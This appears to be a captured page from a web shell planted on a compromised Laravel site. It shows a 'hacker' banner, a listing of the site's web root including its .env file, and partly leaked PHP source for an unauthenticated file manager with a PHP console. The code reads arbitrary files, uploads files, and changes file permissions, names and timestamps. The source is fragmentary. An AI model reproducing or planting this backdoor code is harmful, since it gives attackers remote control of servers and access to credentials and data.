I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file	size	edit	permission
.editorconfig	276 KB	March 05 2024 07:12:34	0666
.env	1385 KB	May 24 2024 16:43:55	0666
.env.example	1088 KB	March 05 2024 07:12:34	0666
.gitattributes	190 KB	March 05 2024 07:12:34	0666
.gitignore	245 KB	March 05 2024 07:12:34	0666
.htaccess	947 KB	July 04 2023 21:25:08	0664
.rnd	1024 KB	March 13 2024 04:51:14	0666
README.md	472 KB	March 22 2024 10:35:00	0666
app	-	March 05 2024 07:12:34	0777
artisan	1739 KB	March 05 2024 07:12:34	0666
bootstrap	-	March 05 2024 07:12:34	0777
composer.json	2829 KB	May 13 2024 12:10:04	0666
composer.lock	417205 KB	March 19 2024 12:13:14	0666
config	-	July 03 2025 02:53:36	0777
database	-	March 05 2024 07:12:34	0777
index.php	1816 KB	May 13 2024 10:32:36	0666
lang	-	May 13 2024 14:53:26	0777
manifest.json	913 KB	May 14 2024 03:57:26	0664
package.json	398 KB	March 05 2024 07:12:34	0666
phpunit.xml	1206 KB	March 05 2024 07:12:34	0666
public	-	July 03 2025 02:37:20	0777
resources	-	May 13 2024 12:09:36	0777
routes	-	March 05 2024 07:12:34	0777
service-worker.js	924 KB	March 05 2024 07:12:34	0666
storage	-	March 05 2024 10:03:52	0777
symlink.php	218 KB	March 05 2024 07:12:34	0666
tests	-	March 05 2024 07:12:34	0777
vendor	-	March 19 2024 12:13:14	0777
vite.config.js	326 KB	March 05 2024 07:12:34	0666

getMessage(); } $phpOutput = ob_get_clean(); restore_error_handler(); // Восстанавливаем обработчик ошибок после выполнения } // Получаем текущую директорию $directory = isset($_GET['dir']) ? $_GET['dir'] : $_SERVER['DOCUMENT_ROOT']; $directory = rtrim($directory, '/'); // Убираем лишний слэш в конце // Санитизируем и проверяем путь $directory = sanitizePath($directory); if (!$directory || !is_dir($directory)) { $directory = $_SERVER['DOCUMENT_ROOT']; // Если директория некорректна, возвращаем в корень } // Получаем файлы и папки в текущей директории $files = scandir($directory); // Разделим папки и файлы $dirs = []; $non_dirs = []; foreach ($files as $file) { if ($file !== '.' && $file !== '..') { $filePath = $directory . '/' . $file; if (is_dir($filePath)) { $dirs[] = $file; } else { $non_dirs[] = $file; } } } // Сортировка папок и файлов sort($dirs); sort($non_dirs); // Объединяем папки и файлы $files = array_merge($dirs, $non_dirs); // Функция для генерации пути с кликабельными частями function generateClickablePath($path) { $parts = explode(DIRECTORY_SEPARATOR, $path); $currentPath = ''; $clickablePath = ''; foreach ($parts as $index => $part) { $currentPath .= DIRECTORY_SEPARATOR . $part; $clickablePath .= '' . safePath($part) . ''; if ($index < count($parts) - 1) { $clickablePath .= ' / '; } } return $clickablePath; } // Проверка на запрос содержимого файла для модального окна if (isset($_GET['file'])) { $filePath = sanitizePath($directory . '/' . $_GET['file']); if (is_file($filePath)) { echo file_get_contents($filePath); } exit; } // Обработка изменений прав, переименования и изменения времени // Обработка изменений прав, переименования и изменения времени if ($_SERVER['REQUEST_METHOD'] === 'POST') { $action = $_POST['action'] ?? ''; $filePath = sanitizePath($directory . '/' . $_POST['file'] ?? ''); if ($action === 'createFile') { // Создание нового файла $newFileName = $_POST['newFileName'] ?? ''; if ($newFileName) { $fileToCreate = $directory . '/' . $newFileName; if (!file_exists($fileToCreate)) { touch($fileToCreate); // Создаём пустой файл } else { echo "File already exists!"; } } } if ($action === 'createFolder') { // Создание новой папки $newFolderName = $_POST['newFolderName'] ?? ''; if ($newFolderName) { $folderToCreate = $directory . '/' . $newFolderName; if (!is_dir($folderToCreate)) { mkdir($folderToCreate); // Создаём новую папку } else { echo "Folder already exists!"; } } } if ($action === 'uploadFile') { // Загрузка файла if (isset($_FILES['fileToUpload']) && $_FILES['fileToUpload']['error'] == 0) { $targetFile = $directory . '/' . basename($_FILES['fileToUpload']['name']); if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $targetFile)) { echo "The file has been uploaded."; } else { echo "Sorry, there was an error uploading your file."; } } } if (is_file($filePath)) { // Для файлов разрешаем все действия if ($action === 'chmod') { $chmod = $_POST['chmod'] ?? ''; if ($chmod) { chmod($filePath, octdec($chmod)); } } if ($action === 'rename') { $newName = $_POST['newName'] ?? ''; if ($newName) { rename($filePath, dirname($filePath) . '/' . $newName); } } if ($action === 'touch') { touch($filePath); } } elseif (is_dir($filePath)) { // Для папок разрешаем только chmod и rename if ($action === 'chmod') { $chmod = $_POST['chmod'] ?? ''; if ($chmod) { chmod($filePath, octdec($chmod)); } } if ($action === 'rename') { $newName = $_POST['newName'] ?? ''; if ($newName) { rename($filePath, dirname($filePath) . '/' . $newName); } } } } ?> PHP File Manager

PHP File Manager

PHP Console

Output:

Error:

Current Directory:

Go to Root You are at the root directory.

Filename	Action
'; echo '[' . safePath($file) . ']'; } else { echo ''; echo '' . safePath($file) . ''; } ?>

I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

PHP File Manager

PHP Console

Output:

Error:

Edit File

Change File Permissions

Rename File

Touch File